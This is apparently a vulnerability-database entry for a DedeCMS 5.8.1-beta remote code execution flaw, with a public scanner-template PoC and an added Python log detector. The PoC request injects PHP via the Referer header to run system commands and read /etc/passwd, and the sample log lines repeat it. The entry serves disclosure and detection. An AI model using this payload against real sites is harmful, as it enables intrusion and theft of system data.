dedecms-rce: DedeCMS 5.8.1-beta - Remote Code Execution

Date: 2025-09-01 | Affected software: dedecms | PoC: public

Vulnerability description

DedeCMS 5.8.1-beta is susceptible to remote code execution via a variable override vulnerability that allows an attacker to construct malicious code with template file inclusion without proper authorization, thus possibly obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.

app="DedeCMS"

PoC code [public]

id: dedecms-rce

info:
  name: DedeCMS 5.8.1-beta - Remote Code Execution
  author: ritikchaddha
  severity: critical
  verified: false
  description: |
    DedeCMS 5.8.1-beta is susceptible to remote code execution via a variable override vulnerability that allows an attacker to construct malicious code with template file inclusion without proper authorization, thus possibly obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.
    app="DedeCMS"
  reference:
    - https://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html
    - https://sectime.top/post/1d114771.html

set:
  hostname: request.url.host
rules:
  r0:
    # request:
    #   method: GET
    #   path: /plus/flink.php?dopost=save&c=cat%20/etc/passwd
    #   headers:
    #     Referer: '<?php "system"($c);die;/*ref'
    request:
      raw: |
        GET /plus/flink.php?dopost=save&c=cat%20/etc/passwd HTTP/1.1
        Host: {{hostname}}
        Referer: <?php "system"($c);die;/*ref
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()
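
A defender-side check for the request pattern in the PoC above, as an added example that is not part of the original entry or of the template author's code: it scans combined-format access logs for requests to plus/flink.php whose Referer carries a PHP open tag. The function names, the path-suffix match for subdirectory installs, and the log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format. Quoted fields may hold escaped quotes:
# Apache writes \" and nginx writes \x22, so the fields allow backslash pairs.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?:[^"\\]|\\.)*"'
)
ESCAPE_RE = re.compile(r'\\(?:x([0-9A-Fa-f]{2})|(["\\]))')


def unescape(field):
    # Undo the hex, quote and backslash escapes a web server applies when logging.
    return ESCAPE_RE.sub(
        lambda m: chr(int(m.group(1), 16)) if m.group(1) else m.group(2), field)


def find_flink_referer_injection(lines):
    """One finding per request to plus/flink.php whose Referer has a PHP open tag."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        url = urlsplit(m["target"])
        referer = unescape(m["referer"])
        # Assumption: the site may live in a subdirectory, so match the path suffix.
        if not url.path.lower().endswith("/plus/flink.php") or "<?" not in referer:
            continue
        findings.append({
            "ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
            "dopost_save": "save" in parse_qs(url.query).get("dopost", []),
            "referer": referer,
        })
    return findings


# Constructed sample lines (documentation IP ranges), not from a real server.
SAMPLE_LOG = r'''
198.51.100.23 - - [01/Sep/2025:10:12:01 +0000] "GET /plus/flink.php?dopost=save&c=cat%20/etc/passwd HTTP/1.1" 200 1843 "<?php \"system\"($c);die;/*ref" "Mozilla/5.0"
198.51.100.23 - - [01/Sep/2025:10:12:05 +0000] "GET /plus/flink.php?dopost=save&c=cat%20/etc/passwd HTTP/1.1" 200 1843 "<?php \x22system\x22($c);die;/*ref" "Mozilla/5.0"
203.0.113.9 - - [01/Sep/2025:10:13:40 +0000] "GET /plus/flink.php HTTP/1.1" 200 5120 "https://example.com/index.php" "Mozilla/5.0"
203.0.113.9 - - [01/Sep/2025:10:14:02 +0000] "GET /index.php HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
'''

if __name__ == "__main__":
    for finding in find_flink_referer_injection(SAMPLE_LOG.splitlines()):
        print(finding)
```

A 200 status on a flagged line matches the first condition of the PoC's `expression`; the response body is not in an access log, so a hit still needs follow-up on the host.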
